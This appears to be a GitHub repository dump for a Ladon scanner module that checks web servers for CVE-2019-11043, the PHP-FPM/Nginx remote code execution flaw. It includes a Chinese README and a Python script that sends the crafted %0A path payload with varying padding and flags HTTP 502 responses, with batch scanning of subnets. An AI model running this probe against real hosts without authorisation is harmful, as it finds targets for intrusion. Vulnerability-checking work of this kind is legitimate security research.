├── CVE-2019-11043_POC.ini
├── CVE-2019-11043-POC.PNG
├── README.md
├── LICENSE
└── CVE-2019-11043-POC.py


/CVE-2019-11043_POC.ini:
--------------------------------------------------------------------------------
1 | [Ladon]
2 | exe=F:\Python279\python.exe
3 | arg=CVE-2019-11043-POC.py $ip$


--------------------------------------------------------------------------------
/CVE-2019-11043-POC.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k8gege/CVE-2019-11043/HEAD/CVE-2019-11043-POC.PNG


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)
 2 | 
 3 | ### 漏洞简介
 4 | PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
 5 | 
 6 | 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
 7 | 
 8 | 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
 9 | 
10 | ### Example
11 | 和Ladon.exe放在同一目录,即可对C段或url.txt进行批量检测
12 | ``` bash
13 | Ladon CVE-2019-11043_Poc.ini 批量URL检测(根目录下放url.txt)
14 | Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini 批量检测C段主机是否存在该漏洞
15 | Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini 指定URL
16 | Ladon 5.5
17 | By K8gege
18 | Call AnyExe/Command
19 | http://192.168.1.37:8080/index.php
20 | load F:\Python279\python.exe
21 | ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php
22 | 
23 | ```
24 | 
25 | <img src=https://github.com/k8gege/CVE-2019-11043/blob/master/CVE-2019-11043-POC.PNG></img>
26 | ### 下载
27 | Ladon: https://github.com/k8gege/Ladon
28 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 k8gege
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/CVE-2019-11043-POC.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import sys
 3 | # Ladon POC by k8gege
 4 | # VUL: CVE-2019-11043 (PHP-FPM + Ngnix)
 5 | # url need include .php Example：http://192.168.1.37:8080/index.php
 6 | 
 7 | # CVE-2019-11043_POC.ini
 8 | # [Ladon]
 9 | # exe=F:\Python279\python.exe
10 | # arg=POC\CVE-2019-11043-POC.py $ip$
11 | 
12 | # Example
13 | # Ladon 192.168.1.37/24 poc/CVE-2019-11043_Poc.ini
14 | # Ladon http://192.168.1.37:8080/index.php poc/CVE-2019-11043_Poc.ini
15 | 
16 | # Result
17 | # Ladon 5.5
18 | # Call AnyExe/Command
19 | # http://192.168.1.37:8080/index.php
20 | # load F:\Python279\python.exe
21 | # ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php
22 | 
23 | def checkpoc(url):
24 | 	try:
25 | 		headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
26 | 		res1 = requests.get(url, headers=headers)
27 | 		if res1.status_code == 200:
28 | 			print "URL: "+url
29 | 			for i in range(1499, 1900):
30 | 				res = requests.get(url + "/PHP%0Ais_poc_thistiest_lang.php?" + "K" * i, headers=headers)
31 | 				if res.status_code == 502:
32 | 					print("ISVUL: CVE-2019-11043 "+url)
33 | 					break
34 | 	except:
35 | 	  pass
36 | 
37 | url = sys.argv[1]
38 | if "http" in url:
39 | 	checkpoc(url)
40 | else:
41 | 	checkpoc("http://"+url+"/index.php")
42 | 	checkpoc("http://"+url+":8080/index.php")
43 | 	checkpoc("https://"+url+"/index.php")
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------